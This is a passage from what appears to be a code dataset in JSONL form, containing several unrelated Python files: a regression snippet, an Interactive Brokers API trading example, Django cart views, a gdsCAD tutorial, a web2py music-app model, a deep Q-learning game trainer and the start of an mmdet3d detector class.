theta[1] + theta[0]\r\n theta += w[i]*self.x[i, 0:2] * alpha * error\r\n return x * theta[1] + theta[0]\r\n\r\n\r\nif __name__ == '__main__':\r\n np.set_printoptions(suppress=True) # 显示10进制\r\n x = load_data()\r\n lwr = LWR(x[0:100])\r\n plt.scatter(lwr.x[:, 1], lwr.x[:, 2], color='b', s=10)\r\n x1 = np.linspace(0, np.max(lwr.x[:, 1]), 100)\r\n z = [lwr.predict(x) for x in x1]\r\n plt.scatter(x1, z, color='r', s=11)\r\n plt.show()","sub_path":"ML/回归/lwlr.py","file_name":"lwlr.py","file_ext":"py","file_size_in_byte":1687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"213182236","text":"# Installing (source activate ENVIRONMENT):\n# Cd to: cd ~/Desktop/Darwinex/darwinex-ibkr/TWS_API/twsapi_macunix.976.01/IBJts/source/pythonclient/\n# Do: python3 setup.py bdist_wheel\n# Do: python3 -m pip install --user --upgrade dist/ibapi-9.76.1-py3-none-any.whl\n\nfrom ibapi.client import EClient\nfrom ibapi.wrapper import EWrapper\nfrom ibapi.contract import Contract, ContractDetails\nfrom ibapi.order import Order\nfrom ibapi.order_state import OrderState\nfrom ibapi.execution import Execution, ExecutionFilter\nfrom ibapi.commission_report import CommissionReport\n\nimport threading, logging, time\nlogging.basicConfig(level=logging.INFO,\n format='%(asctime)s.%(msecs)03d %(levelname)s <> %(funcName)s: %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S')\n\n#######################################\n\nclass AlphaApp(EWrapper, EClient):\n\n def __init__(self):\n\n self.logger = logging.getLogger(__name__)\n EClient.__init__(self, wrapper=self)\n\n ###########################################################\n\n def error(self, reqId: int, errorCode: int, errorString: str):\n\n '''This event is called when there is an error with the\n communication or when TWS wants to send a message to the client.'''\n\n self.logger.error(f'reqId: {reqId} / Code: {errorCode} / Error String: {errorString}')\n\n def contractDetails(self, reqId: int, contractDetails: ContractDetails):\n\n '''Receives the full contract's definitions. This method will return all\n contracts matching the requested via EEClientSocket::reqContractDetails.'''\n\n self.logger.info(f'contractDetails: {contractDetails}')\n\n def openOrder(self, orderId: int, \n contract: Contract, \n order: Order,\n orderState: OrderState):\n\n '''This function is called to feed in open orders.'''\n\n self.logger.info(f'orderId: {orderId} / contract: {contract} / order: {order} / orderState: {orderState}')\n\n def orderStatus(self, orderId: int, \n status: str, \n filled: float,\n remaining: float, \n avgFillPrice: float, \n permId: int,\n parentId: int, \n lastFillPrice: float, \n clientId: int,\n whyHeld: str, \n mktCapPrice: float):\n\n '''This event is called whenever the status of an order changes. 
It is\n also fired after reconnecting to TWS if the client has any open orders.'''\n\n self.logger.info(f'orderId: {orderId} / status: {status} / filled: {filled} / remaining: {remaining} / avgFillPrice: {avgFillPrice} / clientId: {clientId}')\n\n def execDetails(self, reqId: int, \n contract: Contract, \n execution: Execution):\n\n '''This event is fired when the reqExecutions() functions is\n invoked, or when an order is filled.'''\n\n self.logger.info(f'contract: {contract} / execution: {execution}')\n\n def commissionReport(self, commissionReport: CommissionReport):\n\n '''The commissionReport() callback is triggered as follows:\n\n - Immediately after a trade execution.\n - By calling reqExecutions().'''\n\n self.logger.info(f'commissionReport: {commissionReport}')\n\n ###########################################################\n\n def nextValidId(self, orderId: int):\n\n '''Receives next valid order id from TWS.'''\n\n self._nextValidOrderId = orderId\n\n self.logger.info(f'¡Connected!')\n self.logger.info(f'NextValidOrderId: {orderId}')\n \n a = threading.active_count()\n self.logger.info(f'Thread count for reference: {a}')\n\n # Call client method:\n self.reqCurrentTime()\n\n # Request contract data:\n nvidiaStock = self.createUSStockContract('NVDA', primaryExchange='NASDAQ')\n\n # Create orders and place:\n #mktOrder = self.createMarketOrder('BUY', totalQuantity=100)\n #self.placeOrder(self.getNextValidId(), nvidiaStock, mktOrder)\n\n #time.sleep(5)\n\n # Get commission report > Request executions and get the result back:\n execFilter = ExecutionFilter()\n execFilter.acctCode = 'DU2727647'\n execFilter.symbol = 'NVDA'\n self.reqExecutions(self.getNextValidId(), execFilter=execFilter)\n\n def getNextValidId(self) -> int:\n\n '''Get new request ID by incrementing previous one.'''\n\n newId = self._nextValidOrderId\n self._nextValidOrderId += 1\n self.logger.info(f'NextValidOrderId: {newId}')\n return newId\n\n ###########################################################\n\n def createUSStockContract(self, symbol: str, primaryExchange: str):\n\n '''Create a US Stock contract placeholder.'''\n\n contract = Contract()\n contract.symbol = symbol\n contract.secType = 'STK'\n contract.exchange = 'SMART'\n contract.currency = 'USD'\n contract.primaryExchange = primaryExchange\n self.logger.info(f'Contract: {contract}')\n\n return contract\n\n def createMarketOrder(self, action: str, totalQuantity: int):\n\n '''Create a market order.'''\n\n order = Order()\n order.action = action\n order.orderType = 'MKT'\n order.totalQuantity = totalQuantity\n self.logger.info(f'Order: {order}')\n\n return order\n\n def createStopOrder(self, action: str, totalQuantity: int, stopPrice: float):\n\n '''Create a market order.'''\n\n order = Order()\n order.action = action\n order.orderType = 'STP'\n order.totalQuantity = totalQuantity\n order.auxPrice = stopPrice\n self.logger.info(f'Order: {order}')\n\n return order\n\nif __name__ == \"__main__\":\n\n app = AlphaApp()\n app.connect('127.0.0.1', port=7497, clientId=123)\n app.run()","sub_path":"Examples/9_commReportsRequest.py","file_name":"9_commReportsRequest.py","file_ext":"py","file_size_in_byte":6006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"391763186","text":"from django.shortcuts import render\nfrom django.views.decorators.http import require_POST\nfrom .forms import CartAddProductForm\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom shop.models import Product\nfrom 
.cart import Cart\nfrom coupons.forms import CouponApplyForm\n\n\n# Create your views here.\n@require_POST\ndef cart_add(request, product_id):\n cart = Cart(request)\n product = get_object_or_404(Product, id=product_id)\n form = CartAddProductForm(request.POST)\n if form.is_valid():\n cd = form.cleaned_data\n cart.add(product=product,\n quantity=cd['quantity'],\n update_quantity=cd['update'])\n return redirect('cart:cart_detail')\n\ndef cart_remove(request, product_id):\n cart = Cart(request)\n product = get_object_or_404(Product, id=product_id)\n cart.remove(product)\n return redirect('cart:cart_detail')\n\ndef cart_modificate(request):\n cart = Cart(request)\n if request.method == 'POST':\n product_id = request.POST['id']\n button = request.POST['button']\n product = get_object_or_404(Product, id=product_id)\n if button == '+':\n increment = button\n decrement = None\n else:\n increment = None\n decrement = button\n cart.modificate(product, increment, decrement)\n return redirect('cart:cart_detail') \n\ndef cart_detail(request):\n cart = Cart(request)\n for item in cart:\n item['update_quantity_form'] = CartAddProductForm(\n initial={'quantity': item['quantity'],\n 'update': True})\n coupon_apply_form = CouponApplyForm()\n return render(request,\n 'cart/detail.html',\n {'cart': cart,\n 'coupon_apply_form': coupon_apply_form})\n\n\ndef product_detail(request, id, slug):\n product = get_object_or_404(Product,\n id=id,\n slug=slug,\n available=True)\n cart_product_form = CartAddProductForm()\n return render(request, 'product.html', {'product': product,\n 'cart_product_form': cart_product_form})","sub_path":"cart/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"512612401","text":"import os.path\nfrom gdsCAD import *\n\n# Create some things to draw:\namarks = templates.AlignmentMarks(('A', 'C'), (1,2))\ntext = shapes.Label('Hello\\nworld!', 200, (0, 0))\nbox = shapes.Box((-500, -400), (1500, 400), 10, layer=2)\n\n# Create a Cell to hold the objects\ncell = core.Cell('EXAMPLE')\ncell.add([text, box])\ncell.add(amarks, origin=(-200, 0))\ncell.add(amarks, origin=(1200, 0))\n\n# Create two copies of the Cell\ntop = core.Cell('TOP')\ncell_array = core.CellArray(cell, 1, 2, (0, 850))\ntop.add(cell_array)\n\n# Add the copied cell to a Layout and save\nlayout = core.Layout('LIBRARY')\nlayout.add(top)\nlayout.save('output.gds')\n\nlayout.show()\n","sub_path":"tutorial.py","file_name":"tutorial.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"359221626","text":"# -*- coding: utf-8 -*- \n\n#########################################################################\n## This scaffolding model makes your app work on Google App Engine too\n#########################################################################\n\nif request.env.web2py_runtime_gae: # if running on Google App Engine\n db = DAL('gae') # connect to Google BigTable\n session.connect(request, response, db=db) # and store sessions and tickets there\n ### or use the following lines to store sessions in Memcache\n # from gluon.contrib.memdb import MEMDB\n # from google.appengine.api.memcache import Client\n # session.connect(request, response, db=MEMDB(Client())\nelse: # else use a normal relational database\n db = DAL('sqlite://storage2.sqlite') # if not, use SQLite or other DB\n## if no need for session\n# 
session.forget()\n\n#########################################################################\n## Here is sample code if you need for \n## - email capabilities\n## - authentication (registration, login, logout, ... )\n## - authorization (role based authorization)\n## - services (xml, csv, json, xmlrpc, jsonrpc, amf, rss)\n## - crud actions\n## comment/uncomment as needed\n\nfrom gluon.tools import *\nauth=Auth(globals(),db) # authentication/authorization\nauth.settings.hmac_key='sha512:871633f0-1186-44d3-9f20-6797d2e5dd3f'\nauth.define_tables() # creates all needed tables\ncrud=Crud(globals(),db) # for CRUD helpers using auth\nservice=Service(globals()) # for json, xml, jsonrpc, xmlrpc, amfrpc\n\n# crud.settings.auth=auth # enforces authorization on crud\n# mail=Mail() # mailer\n# mail.settings.server='smtp.gmail.com:587' # your SMTP server\n# mail.settings.sender='you@gmail.com' # your email\n# mail.settings.login='username:password' # your credentials or None\n# auth.settings.mailer=mail # for user email verification\n# auth.settings.registration_requires_verification = True\n# auth.settings.registration_requires_approval = True\n# auth.messages.verify_email = 'Click on the link http://'+request.env.http_host+URL(r=request,c='default',f='user',args=['verify_email'])+'/%(key)s to verify your email'\n# auth.settings.reset_password_requires_verification = True\n# auth.messages.reset_password = 'Click on the link http://'+request.env.http_host+URL(r=request,c='default',f='user',args=['reset_password'])+'/%(key)s to reset your password'\n## more options discussed in gluon/tools.py\n#########################################################################\n\n######################################i###################################\n## Define your tables below, for example\n##\n## >>> db.define_table('mytable',Field('myfield','string'))\n##\n## Fields can be 'string','text','password','integer','double','boolean'\n## 'date','time','datetime','blob','upload', 'reference TABLENAME'\n## There is an implicit 'id integer autoincrement' field\n## Consult manual for more options, validators, etc.\n##\n## More API examples for controllers:\n##\n## >>> db.mytable.insert(myfield='value')\n## >>> rows=db(db.mytable.myfield=='value').select(db.mytable.ALL)\n## >>> for row in rows: print row.id, row.myfield\n#########################################################################\nimport datetime\n#User Table is used to store complete information about the user.\ndb.define_table('user',\t\t\t\n\t\tField('first_name','string',requires=IS_NOT_EMPTY(error_message=T(\"Please Fill your First Name\"))),\n\t\tField('last_name','string',requires=IS_NOT_EMPTY(error_message=T(\"Please Fill your Last Name\"))),\n\t\tField('Occupation','string',requires=IS_NOT_EMPTY(error_message=T(\"Please Fill your Occupation!!\"))),\n\t\tField('city','string',requires=IS_NOT_EMPTY(error_message=T(\"Please Fill your City!!\"))),\n\t\tField('country','string',requires=IS_NOT_EMPTY(error_message=T(\"Please Fill your Country!!\"))),\n\t\tField('dob','date',requires=IS_NOT_EMPTY(error_message=T(\"Please Fill your Date Of Birth!!\"))),\n\t\tField('gender','string',requires=IS_IN_SET(['Male','Female']),default='Male',widget=SQLFORM.widgets.radio.widget),\n\t\tField('email_id','string',requires=IS_NOT_EMPTY(error_message=T(\"Please Enter your E-mail id!!\"))),\n\t\tField('password','password',requires=IS_NOT_EMPTY(error_message=T(\"Please choose a 
Password!!\"))),\n\t\tField('retype_password','password',requires=IS_NOT_EMPTY(error_message=T(\"Please Retype your Password!!\"))),\n\t\tField('download_slots','integer'),# No. of download slots available to user.\n\t\tField('rates','integer'),\n\t\tField('slots_used','integer'),\n\t\tField('visits','integer'),\n\t\tField('type','double'))\t\t#type 1=moderator,2=general user\n# Music Table is used to store details of a song.\ndb.define_table('music',\n\t\tField('userid',db.user),\n\t\tField('movie','string'),\n\t\tField('title','string',requires=IS_NOT_EMPTY()),\n\t\tField('artist','string'),\n\t\tField('type','integer'), # type 1=music approved,type2=music not approved\n\t\tField('yor','integer'),\n\t\tField('image','upload',autodelete=True,requires=IS_IMAGE()),\n\t\tField('rating','integer',requires=IS_IN_SET([1,2,3,4,5])),\n\t\tField('filename','string'),\n\t\tField('song','upload',autodelete=True,requires=IS_NOT_EMPTY(error_message=T('Please upload the song !!'))))\n# keyword table is used to store keywords for a particular song.\ndb.define_table('keyword',\n\t\tField('songid',db.music),\n\t\tField('keyword','string',requires=IS_NOT_EMPTY()))\n# song rating table is used to store ratings for music.\ndb.define_table('song_rating',\n\t\tField('songid',db.music),\n\t\tField('rating_sum','integer'),\n\t\tField('users_rated','integer'),\n\t\tField('avg_rating','double'))\n#user rating is used to store ratings given to a song by a particular user.\ndb.define_table('user_rating',\n\t\tField('userid',db.user),\n\t\tField('songid',db.music),\n\t\tField('rating','integer',requires=IS_IN_SET([1,2,3,4,5]),comment='Out of 5'))\n#playlist is used to store playlists of a particular user\ndb.define_table('playlist',\n\t\tField('userid',db.user),\n\t\tField('name','string',requires=IS_NOT_EMPTY(error_message=T('Please Enter a Name !!'))))\n# playlist_song is used to store songs in a particular playlist.\ndb.define_table('playlist_song',\n\t\tField('playlistid',db.playlist),\n\t\tField('songid',db.music))\ndb.define_table('usrhistory',\n\t\tField('userid',db.user),\n\t\tField('login_time','datetime'),\n\t\tField('logout_time','datetime'),\n\t\tField('visitorno','integer'))\ndb.define_table('comments',\n\t\tField('userid',db.user),\n\t\tField('songid',db.music),\n\t\tField('posted_on','datetime'),\n\t\tField('comment','text'))\n#db.user.retype_password.requires=IS_NOT_EMPTY(error_message=T('Please Retype Password!!'))\n#db.playlist_song.playlistid.requires=IS_IN_DB(db(db.playlist.userid==session.id),'playlist.id','%(name)s')\ndb.playlist_song.songid.requires=IS_IN_DB(db(db.music.type==1),'music.id','%(title)s')\ndb.user.email_id.requires=[IS_NOT_IN_DB(db,'user.email_id'),IS_EMAIL(error_message=T(\"Enter Correct E-mail ID\"))]\ndb.user.dob.requires=IS_DATE(error_message=T(\"Enter Date as yyyy-mm-dd\"))\ndb.song_rating.requires=IS_NOT_EMPTY()\ndb.playlist.name.requires=IS_NOT_IN_DB(db(db.playlist.userid==session.id),'playlist.name')\n","sub_path":"Library/models/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":7284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"357591024","text":"# From 22/3/2017, I migrated the code to use the conventions of tensorflow 1.0 and Keras 2.0\n\n# This model is 2 arms controlled by 1 NN. 
The NN has 9 possible controls\n\nfrom __future__ import print_function\n\nimport numpy as np\nimport os\nimport pickle\nimport random\nimport skimage as skimage\nimport time\nfrom collections import deque\nfrom keras.initializers import RandomNormal\nfrom keras.layers import Input, Dense\nfrom keras.layers.convolutional import Conv2D, MaxPooling2D\nfrom keras.layers.core import Dense, Dropout, Activation, Flatten\nfrom keras.models import Model\nfrom keras.models import save_model\nfrom keras.optimizers import SGD, Adam\nfrom skimage import transform, color, exposure\n\nfrom shimon_hero import shimon_hero as sh\n\nSAVE_MODEL = True # If just troubleshooting, then turn SAVE_MODEL off to avoid cluttering the workspace with logs and models\nDEBUG = False # Set to true for verbose printing\n\nNUM_ACTIONS = 3 # number of valid actions\nGAMMA = 0.99 # decay rate of past observations\nOBSERVATION = 3200. # timesteps to observe before training\nEXPLORE = 3000000. # frames over which to anneal epsilon\nFINAL_EPSILON = 0.0001 # final value of epsilon\nINITIAL_EPSILON = 0.1 # starting value of epsilon\nREPLAY_MEMORY = 50000 # number of previous transitions to remember\nBATCH = 32 # size of minibatch\nFRAME_PER_ACTION = 3 # This controls how many frames to wait before deciding on an action. If F_P_A = 1, then Shimon\n# chooses a new action every tick, which causes erratic movements with no exploration middle spaces\n\n# 1NN controlling 2 arms means you need to enumerate all the controls\naction_dict = {0: -1, 1: 0, 2: 1}\n\nimg_rows, img_cols = 80, 80 # All images are downsampled to 80 x 80\nimg_channels = 4 # Stack 4 frames to infer movement\n\n# Initialize instance of Shimon Hero game\ngame = sh.Game() # Instantiate Shimon Hero game\ntimestr = time.strftime(\"%m-%d_%H-%M-%S\") # save the current time to name the model\nmodel_prefix = \"2A1NN_\" + timestr # The prefix used to identify the model and time training was created\n\n# Save the shimon_hero paramters corresponding to the model\nshimon_hero_param = game.get_settings()\nif SAVE_MODEL:\n param_path = \"../saved_models/\" + model_prefix + \"_param.p\"\n with open(param_path, 'wb') as f:\n pickle.dump(shimon_hero_param, f, pickle.HIGHEST_PROTOCOL)\n\n\ndef buildmodel():\n # To make a model with shared weights, need to use Keras Functional API, not Sequential API\n\n input_img = Input(shape=(img_rows, img_cols, img_channels))\n\n # 1st Convolutional layer\n layer1_out = Conv2D(input_shape=(img_rows, img_cols, img_channels),\n filters=32,\n kernel_size=(8, 8),\n strides=(4, 4),\n kernel_initializer=RandomNormal(mean=0.0, stddev=0.01, seed=None),\n padding='same',\n activation='relu')(input_img)\n\n # 2nd Convolutional layer\n layer2_out = Conv2D(filters=64,\n kernel_size=(4, 4),\n strides=(2, 2),\n kernel_initializer=RandomNormal(mean=0.0, stddev=0.01, seed=None),\n padding='same',\n activation='relu')(layer1_out)\n\n # 3rd Convolutional layer\n layer3_out = Conv2D(filters=64,\n kernel_size=(3, 3),\n strides=(1, 1),\n kernel_initializer=RandomNormal(mean=0.0, stddev=0.01, seed=None),\n padding='same',\n activation='relu')(layer2_out)\n\n # Flatten the CNN tensors into a long vector to feed into a Dense (Fully Connected Layer)\n # Up to this point, we have performed feature extraction on the game image. 
Now we need to split\n # it up to left and right arm instructions via FC layers\n CNN_out = Flatten()(layer3_out)\n\n # LEFT ARM\n L_FC1_out = Dense(512,\n kernel_initializer=RandomNormal(mean=0.0, stddev=0.01, seed=None),\n activation='relu')(CNN_out)\n\n L_output = Dense(NUM_ACTIONS,\n name='L_output',\n kernel_initializer=RandomNormal(mean=0.0, stddev=0.01, seed=None))(L_FC1_out)\n\n # RIGHT ARM\n R_FC1_out = Dense(512,\n kernel_initializer=RandomNormal(mean=0.0, stddev=0.01, seed=None),\n activation='relu')(CNN_out)\n\n R_output = Dense(NUM_ACTIONS,\n name='R_output',\n kernel_initializer=RandomNormal(mean=0.0, stddev=0.01, seed=None))(R_FC1_out)\n\n # Use the Adam optimizer for gradient descent\n adam = Adam(lr=1e-6)\n\n # Compile the model\n # model.compile(loss='mse', optimizer=adam)\n\n model = Model(inputs=input_img, outputs=[L_output, R_output])\n model.compile(optimizer=adam,\n loss='mse',\n loss_weights=[1.0, 1.0])\n\n # Print a summary of the model\n print(model.summary())\n return model\n\n\ndef trainNetwork(model):\n # DeepMind papers uses what is called a \"Replay Memory\". Replay Memory stores a collection of states (or frames).\n # When the network is trained, a random sample is taken from Replay Memory. This is to retain i.i.d condition\n # since subsequent frames have highly correlated movement. Use deque() object from python library.\n RM = deque()\n\n # Get the first frame by doing nothing, for two arms this is [0, 0]\n image_data, r_t, game_over, game_score = game.next_action([0, 0])\n\n # Preprocess image --> Change to greyscale and downscale to 80x80\n x_t = skimage.color.rgb2gray(image_data)\n x_t = skimage.transform.resize(x_t, (80, 80))\n x_t = skimage.exposure.rescale_intensity(x_t, out_range=(0, 255))\n # plt.matshow(x_t, cmap=plt.cm.gray)\n # plt.show()\n\n # To infer movement between frames, stack 4 frames together as one \"sample\" for training\n s_t = np.stack((x_t, x_t, x_t, x_t), axis=0)\n\n # To feed data into CNN, it must be in the correct tensor format\n # In tensorflow, it must be in the form (1,80,80,4)\n s_t = s_t.reshape(1, s_t.shape[1], s_t.shape[2], s_t.shape[0])\n\n # Variables for parameter annealing\n OBSERVE = OBSERVATION\n epsilon = INITIAL_EPSILON\n\n # Create a log to store the training variables at each time step\n model_log_dir = \"../saved_models/\" + model_prefix + \"_LOG.txt\"\n if SAVE_MODEL:\n if not os.path.exists(model_log_dir):\n with open(model_log_dir, \"w\") as text_file:\n text_file.write(\"Model Log \" + timestr + \"\\n\")\n\n t = 0\n L_action_index = 0\n R_action_index = 0\n max_score = 0\n while (True):\n # Declare a few variables for the Bellman Equation\n loss = 0\n Q_sa_t1 = 0\n\n # To prevent the model from falling into a local minimum or \"exploring only one side of the screen\",\n # DeepMind chooses a random action from time to time to encourage exploration of other states (a hack)\n if t % FRAME_PER_ACTION == 0: # This selects an action depending on FRAME_PER_ACTION (default = 1)\n # print(\"--- { NEW ACTION } ---\")\n\n q_predictions = model.predict(s_t) # for 2 arms this looks like [array([[ 0.0046034 , -0.00290494, -0.00516033]], dtype=float32), array([[ 0.00205019, -0.01548742, -0.00640914]], dtype=float32)]\n L_action_index = np.argmax(q_predictions[0].flatten()) # L_action_index = L_max_Q = np.argmax(q_predictions[0].flatten())\n R_action_index = np.argmax(q_predictions[1].flatten()) # R_action_index = R_max_Q = np.argmax(q_predictions[1].flatten())\n\n # As time progresses, reduce epsilon gradually. 
This concept is exactly like \"Simulated Annealing\".\n            # Epsilon starts out high (default=0.1) and tends towards FINAL_EPSILON (default=0.0001). So the\n            # system begins with high energy and is likely to jump around to new states and gradually \"cools\"\n            # to an optimal minimum.\n            if epsilon > FINAL_EPSILON and t > OBSERVE:\n                epsilon -= (INITIAL_EPSILON - FINAL_EPSILON) / EXPLORE\n\n            # Epsilon-greedy exploration (restoring the random branch described above):\n            # with probability epsilon, overwrite the greedy choice with random actions.\n            if random.random() <= epsilon:\n                L_action_index = random.randrange(NUM_ACTIONS)\n                R_action_index = random.randrange(NUM_ACTIONS)\n\n        # run the selected actions and observe the next state and r_t\n\n        image_data, r_t, game_over, game_score = game.next_action([action_dict[L_action_index], action_dict[R_action_index]])\n\n        # preprocess the image\n        x_t1 = skimage.color.rgb2gray(image_data)\n        x_t1 = skimage.transform.resize(x_t1, (80, 80))\n        x_t1 = skimage.exposure.rescale_intensity(x_t1, out_range=(0, 255))\n\n        x_t1 = x_t1.reshape(1, x_t1.shape[0], x_t1.shape[1], 1)  # This is just one image frame (1,80,80,1)\n\n        # From previous s_t stack, take the top 3 layers and stack these below x_t1\n        s_t1 = np.append(x_t1, s_t[:, :, :, :3], axis=3)\n\n        # Store this transition in RM (Replay Memory). The transition contains information on state, the two action indices, r_t, the next state, and whether it is game over.\n        RM.append((s_t, (L_action_index, R_action_index), r_t, s_t1, game_over))\n        if len(RM) > REPLAY_MEMORY:\n            RM.popleft()  # Get rid of the oldest item added to deque object\n\n        # Up until this point, the code has just been playing the game and storing the image stacks.\n        # After a certain number of observations defined by OBSERVE (default = 3200), we have enough\n        # data points in RM (Replay Memory) to begin drawing batches of training data\n        if t > OBSERVE:\n            # Sample a minibatch to train on\n            mini_batch = random.sample(RM, BATCH)  # From selection RM, choose BATCH=32 number of times\n\n            # Neural Networks are universal function approximators. Given an input stack of 4 images, we want the network\n            # to output the correct Q(s,a) for each possible action given a state (the state is the stack of 4 images.)\n            # This is like the y=f(x) problem where network is trying to learn the best f so that x maps onto y.\n            # The \"targets\" are the outputs, which correspond to the Q(s,a) value for each possible action a, one set per arm.\n            inputs = np.zeros((BATCH, s_t.shape[1], s_t.shape[2], s_t.shape[3]))  # This should (32,80,80,4)\n            L_targets = np.zeros((BATCH, NUM_ACTIONS))  # This should be (32,3) and stores the targets for the left head\n            R_targets = np.zeros((BATCH, NUM_ACTIONS))  # This should be (32,3) and stores the targets for the right head\n\n            # Use random indices to select minibatch from Replay Memory\n            for i in range(0, len(mini_batch)):\n                state_t = mini_batch[i][0]  # This is the state\n                L_action_t, R_action_t = mini_batch[i][1]  # These are the two action indices\n                reward_t = mini_batch[i][2]  # This is the r_t at state t\n                state_t1 = mini_batch[i][3]  # This is the next state t+1\n                game_over_t = mini_batch[i][4]  # This is the boolean of whether game is over\n\n                # Populate input tensor with samples. Remember inputs begins as np.zeros(32,80,80,4). We are now\n                # filling it in line by line as i is incremented over minibatch\n                inputs[i:i + 1] = state_t\n\n                # Use model to predict the output actions given state_t. This is like the LHS of Bellman EQN\n                L_targets[i], R_targets[i] = [q[0] for q in model.predict(state_t)]\n                # Use model to predict the output actions given state_t1. This is the Q(s',a') in the RHS of Bellman EQN\n                Q_sa_t1 = model.predict(state_t1)  # This is a list of two 1x3 vectors, one per head\n\n                # if game_over_t=True, then the target equals reward_t\n                if game_over_t:\n                    L_targets[i, L_action_t] = reward_t\n                    R_targets[i, R_action_t] = reward_t\n                # if game is still playing, then the taken actions receive a discounted reward_t\n                else:\n                    L_targets[i, L_action_t] = reward_t + (GAMMA * np.max(Q_sa_t1[0]))\n                    R_targets[i, R_action_t] = reward_t + (GAMMA * np.max(Q_sa_t1[1]))\n
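                # Worked example of the update above (illustrative numbers only): with\n                # reward_t = 1.0, GAMMA = 0.99 and max Q(s',a') = 0.5 for one head, that\n                # head's entry for the taken action becomes 1.0 + 0.99 * 0.5 = 1.495,\n                # while every other entry keeps the model's current prediction, so the\n                # regression only pulls on the Q-value of the action actually taken.\n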
                # What just happened? After the step above, each row of L_targets/R_targets holds the\n                # model's current predictions except at the index of the action actually taken, which now\n                # carries the (discounted) Bellman target obtained from Bellman EQN.\n                # We want the weight training process to bias towards the action indices with highest r_t.\n                # I think the example uses a very hacky method.\n\n            # Compute the cumulative loss\n            loss += model.train_on_batch(inputs, [L_targets, R_targets])[0]  # element 0 is the summed loss over both heads\n\n        # Update variables for next pass\n        s_t = s_t1\n        t = t + 1\n\n        # Keep track of the highest score and write to file if max_score changes\n        if game_score > max_score:\n            max_score = game_score\n            logging_string = \"TIME %8d | MAX_SCORE %3d\" % (t, max_score)\n            print(logging_string)\n            if SAVE_MODEL:\n                # If saving model, then only update the text file with information on the time step and the score\n                with open(model_log_dir, 'a') as text_file:\n                    text_file.write(logging_string + \"\\n\")\n\n        if DEBUG:\n            # Track current annealed state\n            if t <= OBSERVE:\n                state = \"Observing\"\n            elif t > OBSERVE and t <= OBSERVE + EXPLORE:\n                state = \"Exploring\"\n            else:\n                state = \"Training\"\n            debugging_string = \"TIME %8d | STATE %1s | EPS %3.10f | ACT %1d/%1d | REW %5.1f | Q_MAX_t1 %8.4f | LOSS %8.4f | GAME_O %s | MAX_SCORE %3d\" % (\n                t, state, epsilon, L_action_index, R_action_index, r_t, np.max(Q_sa_t1), loss, str(game_over), max_score)\n            print(debugging_string)\n\n        if SAVE_MODEL and t % 10000 == 0:\n            # Save progress every 10,000 iterations\n            print(\"Saving model at timestep: \" + str(t))\n            model_path = \"../saved_models/\" + model_prefix + \".h5\"\n            save_model(model, model_path,\n                       overwrite=True)  # saves weights, network topology and optimizer state (if any)\n\n        if t % 5000 == 0:\n            print(\"Timestep: \", t)\n\n    game.exit_game()\n\n\ndef main():\n    model = buildmodel()\n    trainNetwork(model)\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"UnitTests/sharedLayersUT1.py","file_name":"sharedLayersUT1.py","file_ext":"py","file_size_in_byte":13828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"117079934","text":"from Map import Map\nimport pygame, random, sys\n\npygame.init()\n\nscreen = pygame.display.set_mode([500,500])\n\nrunning = True\nwhile running:\n    # Did the user click the window close button?\n    for event in pygame.event.get():\n        if event.type == pygame.QUIT:\n            running = False\n    \n    # Fill the background with white\n    screen.fill((255, 255, 255))\n\n    # Draw a solid blue circle in the center\n    pygame.draw.circle(screen, (0, 0, 255), (250, 250), 75)\n\n    # Flip the display\n    pygame.display.flip()\n\n# Done! 
Time to quit.\npygame.quit()\n\nmap1 = Map(6, 6)\nprint(map1.getPath(5, 5, 4, 1))\nprint(map1.findPath(input(), False))\n","sub_path":"MapTest.py","file_name":"MapTest.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"569183922","text":"import math\nfrom mmdet3d.models.detectors.base import Base3DDetector\nimport torch\nfrom torch import nn as nn\n\nfrom mmdet3d.core import bbox3d2result, merge_aug_bboxes_3d\nfrom mmdet.models import DETECTORS, build_backbone, build_neck, build_head\n\n\n@DETECTORS.register_module()\nclass FVNet(Base3DDetector):\n\n    def __init__(self,\n                 projection_cfg=None,\n                 fv_backbone=None,\n                 fv_neck=None,\n                 img_backbone=None,\n                 img_neck=None,\n                 bbox_head=None,\n                 fusion_mode=None,\n                 train_cfg=None,\n                 test_cfg=None,\n                 init_cfg=None,\n                 pretrained=None):\n        super(FVNet, self).__init__(init_cfg)\n\n        self.projection_cfg = projection_cfg\n        if fv_backbone:\n            self.fv_backbone = build_backbone(fv_backbone)\n        if fv_neck:\n            self.fv_neck = build_neck(fv_neck)\n        if img_backbone:\n            self.img_backbone = build_backbone(img_backbone)\n        if img_neck:\n            self.img_neck = build_neck(img_neck)\n        if bbox_head:\n            self.bbox_head = build_head(bbox_head)\n\n        self.fusion_mode = fusion_mode\n        self.train_cfg = train_cfg\n        self.test_cfg = test_cfg\n        # TODO: implement loading of pretrained weights for the image backbone\n\n    @property\n    def with_fv_backbone(self):\n        \"\"\"bool: Whether the detector has a backbone in the front-view branch.\"\"\"\n        return hasattr(self, 'fv_backbone') and self.fv_backbone is not None\n\n    @property\n    def with_fv_neck(self):\n        \"\"\"bool: Whether the detector has a neck in the front-view branch.\"\"\"\n        return hasattr(self, 'fv_neck') and self.fv_neck is not None\n\n    @property\n    def with_img_backbone(self):\n        \"\"\"bool: Whether the detector has a backbone in the image branch.\"\"\"\n        return hasattr(self, 'img_backbone') and self.img_backbone is not None\n\n    @property\n    def with_img_neck(self):\n        \"\"\"bool: Whether the detector has a neck in the image branch.\"\"\"\n        return hasattr(self, 'img_neck') and self.img_neck is not None\n\n    def extract_img_feat(self, img, img_metas):\n        \"\"\"Extract features of images.\"\"\"\n        if 